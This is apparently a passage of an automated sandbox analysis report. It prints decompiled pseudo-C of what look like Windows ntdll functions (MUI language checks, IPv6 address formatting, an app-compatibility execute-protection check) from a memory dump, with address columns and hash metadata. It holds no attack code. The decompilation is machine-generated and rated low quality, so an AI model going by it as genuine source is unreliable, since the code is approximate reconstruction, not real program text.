					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                        0x00908788
                                                                                                                                                        0x00908788
                                                                                                                                                        0x00908791
                                                                                                                                                        0x00908794
                                                                                                                                                        0x00908798
                                                                                                                                                        0x0090879b
                                                                                                                                                        0x0090879e
                                                                                                                                                        0x009087a1
                                                                                                                                                        0x009087a4
                                                                                                                                                        0x009087a7
                                                                                                                                                        0x009087aa
                                                                                                                                                        0x009087af
                                                                                                                                                        0x00951ad3
                                                                                                                                                        0x00908b0a
                                                                                                                                                        0x00908b0d
                                                                                                                                                        0x00908b13
                                                                                                                                                        0x00908b19
                                                                                                                                                        0x00908b1f
                                                                                                                                                        0x00908b25
                                                                                                                                                        0x00908b2b
                                                                                                                                                        0x00908b31
                                                                                                                                                        0x00908b37
                                                                                                                                                        0x00908b3d
                                                                                                                                                        0x00908b46
                                                                                                                                                        0x00908b46
                                                                                                                                                        0x009087c6
                                                                                                                                                        0x009087d0
                                                                                                                                                        0x00951ae0
                                                                                                                                                        0x00951ae6
                                                                                                                                                        0x00951af8
                                                                                                                                                        0x00951af8
                                                                                                                                                        0x00951afd
                                                                                                                                                        0x00951afe
                                                                                                                                                        0x00951b01
                                                                                                                                                        0x00951b06
                                                                                                                                                        0x00951b06
                                                                                                                                                        0x009087d6
                                                                                                                                                        0x009087f2
                                                                                                                                                        0x009087f7
                                                                                                                                                        0x00908807
                                                                                                                                                        0x0090880a
                                                                                                                                                        0x0090880f
                                                                                                                                                        0x00908810
                                                                                                                                                        0x00908813
                                                                                                                                                        0x00908818
                                                                                                                                                        0x00908818
                                                                                                                                                        0x0090882c
                                                                                                                                                        0x00908831
                                                                                                                                                        0x00908838
                                                                                                                                                        0x00908908
                                                                                                                                                        0x00908920
                                                                                                                                                        0x009089f0
                                                                                                                                                        0x00908a08
                                                                                                                                                        0x00908af6
                                                                                                                                                        0x00908af6
                                                                                                                                                        0x00908af8
                                                                                                                                                        0x00908afb
                                                                                                                                                        0x00951beb
                                                                                                                                                        0x00951beb
                                                                                                                                                        0x00908b04
                                                                                                                                                        0x00951bf8
                                                                                                                                                        0x00951c0e
                                                                                                                                                        0x00951c13
                                                                                                                                                        0x00951c16
                                                                                                                                                        0x00951c16
                                                                                                                                                        0x00951bf8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00908b04
                                                                                                                                                        0x00908a0e
                                                                                                                                                        0x00908a11
                                                                                                                                                        0x00908a14
                                                                                                                                                        0x00908a15
                                                                                                                                                        0x00908a18
                                                                                                                                                        0x00908a22
                                                                                                                                                        0x00908b59
                                                                                                                                                        0x00908a28
                                                                                                                                                        0x00908a3c
                                                                                                                                                        0x00908a3c
                                                                                                                                                        0x00908a42
                                                                                                                                                        0x00951bb0
                                                                                                                                                        0x00951b11
                                                                                                                                                        0x00951b11
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00908a48
                                                                                                                                                        0x00908a51
                                                                                                                                                        0x00908a5b
                                                                                                                                                        0x00908a5e
                                                                                                                                                        0x00908a61
                                                                                                                                                        0x00908a69
                                                                                                                                                        0x00908a69
                                                                                                                                                        0x00908a6d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00908a74
                                                                                                                                                        0x00908a7c
                                                                                                                                                        0x00908a7d
                                                                                                                                                        0x00908a91
                                                                                                                                                        0x00908a93
                                                                                                                                                        0x00908a93
                                                                                                                                                        0x00908a98
                                                                                                                                                        0x00908a9b
                                                                                                                                                        0x00908aa1
                                                                                                                                                        0x00908aa1
                                                                                                                                                        0x00908aa4
                                                                                                                                                        0x00908aaa
                                                                                                                                                        0x00908ab1
                                                                                                                                                        0x00908ac5
                                                                                                                                                        0x00908ac7
                                                                                                                                                        0x00908ac7
                                                                                                                                                        0x00908ac5
                                                                                                                                                        0x00908ace
                                                                                                                                                        0x00951bc9
                                                                                                                                                        0x00951bce
                                                                                                                                                        0x00951bd2
                                                                                                                                                        0x00951bd2
                                                                                                                                                        0x00908ad8
                                                                                                                                                        0x00908aeb
                                                                                                                                                        0x00908aeb
                                                                                                                                                        0x00908af0
                                                                                                                                                        0x00908af4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00908af4
                                                                                                                                                        0x00908a42
                                                                                                                                                        0x00908926
                                                                                                                                                        0x00908929
                                                                                                                                                        0x0090892c
                                                                                                                                                        0x0090892d
                                                                                                                                                        0x00908930
                                                                                                                                                        0x00908935
                                                                                                                                                        0x0090893a
                                                                                                                                                        0x00908b51
                                                                                                                                                        0x00908940
                                                                                                                                                        0x00908954
                                                                                                                                                        0x00908954
                                                                                                                                                        0x0090895a
                                                                                                                                                        0x00951b63
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00908960
                                                                                                                                                        0x00908969
                                                                                                                                                        0x00908973
                                                                                                                                                        0x00908976
                                                                                                                                                        0x00908979
                                                                                                                                                        0x0090897e
                                                                                                                                                        0x00908981
                                                                                                                                                        0x00908981
                                                                                                                                                        0x00908986
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00951b6e
                                                                                                                                                        0x00951b74
                                                                                                                                                        0x00951b7b
                                                                                                                                                        0x00951b8f
                                                                                                                                                        0x00951b91
                                                                                                                                                        0x00951b91
                                                                                                                                                        0x00951b99
                                                                                                                                                        0x00951b9c
                                                                                                                                                        0x00951ba2
                                                                                                                                                        0x00951ba2
                                                                                                                                                        0x0090898c
                                                                                                                                                        0x00908992
                                                                                                                                                        0x00908999
                                                                                                                                                        0x009089ad
                                                                                                                                                        0x00951ba8
                                                                                                                                                        0x00951ba8
                                                                                                                                                        0x009089ad
                                                                                                                                                        0x009089b6
                                                                                                                                                        0x009089c8
                                                                                                                                                        0x009089cd
                                                                                                                                                        0x009089d0
                                                                                                                                                        0x009089d0
                                                                                                                                                        0x009089d6
                                                                                                                                                        0x009089e8
                                                                                                                                                        0x009089e8
                                                                                                                                                        0x009089ed
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009089ed
                                                                                                                                                        0x0090895a
                                                                                                                                                        0x0090883e
                                                                                                                                                        0x00908841
                                                                                                                                                        0x00908844
                                                                                                                                                        0x00908845
                                                                                                                                                        0x00908848
                                                                                                                                                        0x0090884d
                                                                                                                                                        0x00908852
                                                                                                                                                        0x00908b49
                                                                                                                                                        0x00908858
                                                                                                                                                        0x0090886c
                                                                                                                                                        0x0090886c
                                                                                                                                                        0x00908872
                                                                                                                                                        0x00951b0e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00908878
                                                                                                                                                        0x00908881
                                                                                                                                                        0x0090888b
                                                                                                                                                        0x0090888e
                                                                                                                                                        0x00908891
                                                                                                                                                        0x00908896
                                                                                                                                                        0x00908899
                                                                                                                                                        0x00908899
                                                                                                                                                        0x0090889e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00951b21
                                                                                                                                                        0x00951b27
                                                                                                                                                        0x00951b2e
                                                                                                                                                        0x00951b42
                                                                                                                                                        0x00951b44
                                                                                                                                                        0x00951b44
                                                                                                                                                        0x00951b4c
                                                                                                                                                        0x00951b4f
                                                                                                                                                        0x00951b55
                                                                                                                                                        0x00951b55
                                                                                                                                                        0x009088a4
                                                                                                                                                        0x009088aa
                                                                                                                                                        0x009088b1
                                                                                                                                                        0x009088c5
                                                                                                                                                        0x00951b5b
                                                                                                                                                        0x00951b5b
                                                                                                                                                        0x009088c5
                                                                                                                                                        0x009088ce
                                                                                                                                                        0x009088e0
                                                                                                                                                        0x009088e5
                                                                                                                                                        0x009088e8
                                                                                                                                                        0x009088e8
                                                                                                                                                        0x009088ee
                                                                                                                                                        0x00908900
                                                                                                                                                        0x00908900
                                                                                                                                                        0x00908905
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00908905

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 00908827
                                                                                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 009087E6
                                                                                                                                                        • Kernel-MUI-Language-SKU, xrefs: 009089FC
                                                                                                                                                        • WindowsExcludedProcs, xrefs: 009087C1
                                                                                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 00908914
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcspbrk
                                                                                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                        • API String ID: 402402107-258546922
                                                                                                                                                        • Opcode ID: b0295194600aac96e902859a30d56bc301bdc7d0a680cc4dc90685d52cca2927
                                                                                                                                                        • Instruction ID: d5b8b31f5906aec0b39d198ffaf365a0d44bee7c5842811dc6851a4495d599da
                                                                                                                                                        • Opcode Fuzzy Hash: b0295194600aac96e902859a30d56bc301bdc7d0a680cc4dc90685d52cca2927
                                                                                                                                                        • Instruction Fuzzy Hash: 01F1F8B2D00649EFCF11EF99C981AEEBBB8FF08300F14446AE515E7251EB349A45DB61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 009213CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 38%
                                                                                                                                                        			E009213CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00917707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x8e2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00917707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x8e9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00917707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00917707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00917707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00917707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                        0x009213d5
                                                                                                                                                        0x009213d9
                                                                                                                                                        0x009213dc
                                                                                                                                                        0x009213de
                                                                                                                                                        0x009213e1
                                                                                                                                                        0x009213e8
                                                                                                                                                        0x009213ee
                                                                                                                                                        0x0094e8fd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094e921
                                                                                                                                                        0x0094e921
                                                                                                                                                        0x0094e928
                                                                                                                                                        0x0094e982
                                                                                                                                                        0x0094e98a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094e99a
                                                                                                                                                        0x0094e99e
                                                                                                                                                        0x0094e9a3
                                                                                                                                                        0x0094e9a8
                                                                                                                                                        0x0094e9b9
                                                                                                                                                        0x0094e978
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094e978
                                                                                                                                                        0x0094e98a
                                                                                                                                                        0x0094e92a
                                                                                                                                                        0x0094e931
                                                                                                                                                        0x0094e944
                                                                                                                                                        0x0094e944
                                                                                                                                                        0x0094e950
                                                                                                                                                        0x0094e954
                                                                                                                                                        0x0094e959
                                                                                                                                                        0x0094e95e
                                                                                                                                                        0x0094e963
                                                                                                                                                        0x0094e970
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094e975
                                                                                                                                                        0x0094e93b
                                                                                                                                                        0x0094e980
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094e980
                                                                                                                                                        0x0094e942
                                                                                                                                                        0x0094e94b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094e94b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094e942
                                                                                                                                                        0x009213f4
                                                                                                                                                        0x009213f4
                                                                                                                                                        0x009213f9
                                                                                                                                                        0x009213fc
                                                                                                                                                        0x009213ff
                                                                                                                                                        0x00921406
                                                                                                                                                        0x0094e9cc
                                                                                                                                                        0x0094e9d2
                                                                                                                                                        0x0094e9d2
                                                                                                                                                        0x0094e9cc
                                                                                                                                                        0x0092140c
                                                                                                                                                        0x00921411
                                                                                                                                                        0x00921431
                                                                                                                                                        0x0092143a
                                                                                                                                                        0x0092143c
                                                                                                                                                        0x0092143f
                                                                                                                                                        0x0092143f
                                                                                                                                                        0x00921442
                                                                                                                                                        0x00921447
                                                                                                                                                        0x009214a8
                                                                                                                                                        0x009214ac
                                                                                                                                                        0x0094e9e2
                                                                                                                                                        0x0094e9e7
                                                                                                                                                        0x0094e9ec
                                                                                                                                                        0x0094ea05
                                                                                                                                                        0x0094ea05
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00921449
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00921449
                                                                                                                                                        0x0092144c
                                                                                                                                                        0x00921459
                                                                                                                                                        0x00921462
                                                                                                                                                        0x00921469
                                                                                                                                                        0x0092146a
                                                                                                                                                        0x00921470
                                                                                                                                                        0x00921473
                                                                                                                                                        0x00921476
                                                                                                                                                        0x00921476
                                                                                                                                                        0x00921490
                                                                                                                                                        0x00921495
                                                                                                                                                        0x0092138e
                                                                                                                                                        0x00921390
                                                                                                                                                        0x00921397
                                                                                                                                                        0x00921398
                                                                                                                                                        0x00921399
                                                                                                                                                        0x009213a1
                                                                                                                                                        0x009213a4
                                                                                                                                                        0x009213a4
                                                                                                                                                        0x00921498
                                                                                                                                                        0x0092149c
                                                                                                                                                        0x0092149f
                                                                                                                                                        0x009214a2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009214a4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009214a4
                                                                                                                                                        0x00921413
                                                                                                                                                        0x00921415
                                                                                                                                                        0x00921416
                                                                                                                                                        0x00921419
                                                                                                                                                        0x0092141c
                                                                                                                                                        0x00921422
                                                                                                                                                        0x009213b7
                                                                                                                                                        0x009213bc
                                                                                                                                                        0x009213bf
                                                                                                                                                        0x009213bf
                                                                                                                                                        0x009213c2
                                                                                                                                                        0x00921424
                                                                                                                                                        0x00921424
                                                                                                                                                        0x00921424
                                                                                                                                                        0x00921427
                                                                                                                                                        0x0092142b
                                                                                                                                                        0x0092142c
                                                                                                                                                        0x0092142c
                                                                                                                                                        0x0092142c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092141c
                                                                                                                                                        0x00921411

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                                        • Opcode ID: a403977b2df3a340a5bc4f0f3bf8d28a811274723920e54991703c20bf4ba03c
                                                                                                                                                        • Instruction ID: fa12d8b7a289918ab0646b0c93a12e58c6cad99d3e65512d48ca47a8b15c9844
                                                                                                                                                        • Opcode Fuzzy Hash: a403977b2df3a340a5bc4f0f3bf8d28a811274723920e54991703c20bf4ba03c
                                                                                                                                                        • Instruction Fuzzy Hash: 1B614B71A04665A6CF34DF99D8808BEBBBAFFE5300B14C42DF4DA47684D374AA50CB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00917EFD, Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 127COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                        			E00917EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x9c2088; // 0x77777575
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00917F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00933F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E008EDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x9c4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00933F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E008F0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00933F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E008F8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00933F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0095E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00933F92();
					_t38 = 1;
					L2:
					return E008EE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                        0x00917f08
                                                                                                                                                        0x00917f0f
                                                                                                                                                        0x00917f12
                                                                                                                                                        0x00917f1b
                                                                                                                                                        0x00917f31
                                                                                                                                                        0x00933ead
                                                                                                                                                        0x00933eb4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00933eba
                                                                                                                                                        0x00933ecd
                                                                                                                                                        0x00933ed2
                                                                                                                                                        0x00933ee1
                                                                                                                                                        0x00933ee7
                                                                                                                                                        0x00933eec
                                                                                                                                                        0x00933f12
                                                                                                                                                        0x00933f18
                                                                                                                                                        0x00933f1a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00933f20
                                                                                                                                                        0x00933f26
                                                                                                                                                        0x00933f28
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00933f2e
                                                                                                                                                        0x00933f30
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00933f3a
                                                                                                                                                        0x00933f3b
                                                                                                                                                        0x00933f53
                                                                                                                                                        0x00933f64
                                                                                                                                                        0x00933f69
                                                                                                                                                        0x00933f6c
                                                                                                                                                        0x00933f6d
                                                                                                                                                        0x00933f6f
                                                                                                                                                        0x0093e304
                                                                                                                                                        0x0093e30f
                                                                                                                                                        0x0093e315
                                                                                                                                                        0x0093e31e
                                                                                                                                                        0x0093e321
                                                                                                                                                        0x0093e327
                                                                                                                                                        0x0093e329
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0093e32f
                                                                                                                                                        0x0093e32f
                                                                                                                                                        0x0093e337
                                                                                                                                                        0x0093e33a
                                                                                                                                                        0x0093e33b
                                                                                                                                                        0x0093e33d
                                                                                                                                                        0x0093e33f
                                                                                                                                                        0x0093e341
                                                                                                                                                        0x0093e341
                                                                                                                                                        0x0093e34e
                                                                                                                                                        0x0093e353
                                                                                                                                                        0x0093e358
                                                                                                                                                        0x0093e35d
                                                                                                                                                        0x0093e35f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0093e365
                                                                                                                                                        0x0093e365
                                                                                                                                                        0x0093e368
                                                                                                                                                        0x0093e36e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0093e374
                                                                                                                                                        0x0093e32f
                                                                                                                                                        0x00933f75
                                                                                                                                                        0x00933f7a
                                                                                                                                                        0x00933f7c
                                                                                                                                                        0x00933f7e
                                                                                                                                                        0x00933f86
                                                                                                                                                        0x00917f39
                                                                                                                                                        0x00917f47
                                                                                                                                                        0x00917f47
                                                                                                                                                        0x00917f37
                                                                                                                                                        0x00917f37
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00933F12
                                                                                                                                                        Strings
                                                                                                                                                        • Execute=1, xrefs: 00933F5E
                                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00933F4A
                                                                                                                                                        • ExecuteOptions, xrefs: 00933F04
                                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00933F75
                                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 0093E345
                                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0093E2FB
                                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00933EC4
                                                                                                                                                        • uuww, xrefs: 00917F08
                                                                                                                                                        • P&N, xrefs: 00917F1E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BaseDataModuleQuery
                                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$P&N$uuww
                                                                                                                                                        • API String ID: 3901378454-468390191
                                                                                                                                                        • Opcode ID: ff7baaf40b6bf58b9e4e48120d924cbc832683b053e0247b933c9944f3afab8d
                                                                                                                                                        • Instruction ID: 41e9fa84d98052e166f9121288f570dd953eeb524a931df6e2d59f36ad310da4
                                                                                                                                                        • Opcode Fuzzy Hash: ff7baaf40b6bf58b9e4e48120d924cbc832683b053e0247b933c9944f3afab8d
                                                                                                                                                        • Instruction Fuzzy Hash: 7441B771B8021D7ADF20DA95DC86FEBB3BCEB55700F0005A9B505E6181EA70DB86CF61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00920B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
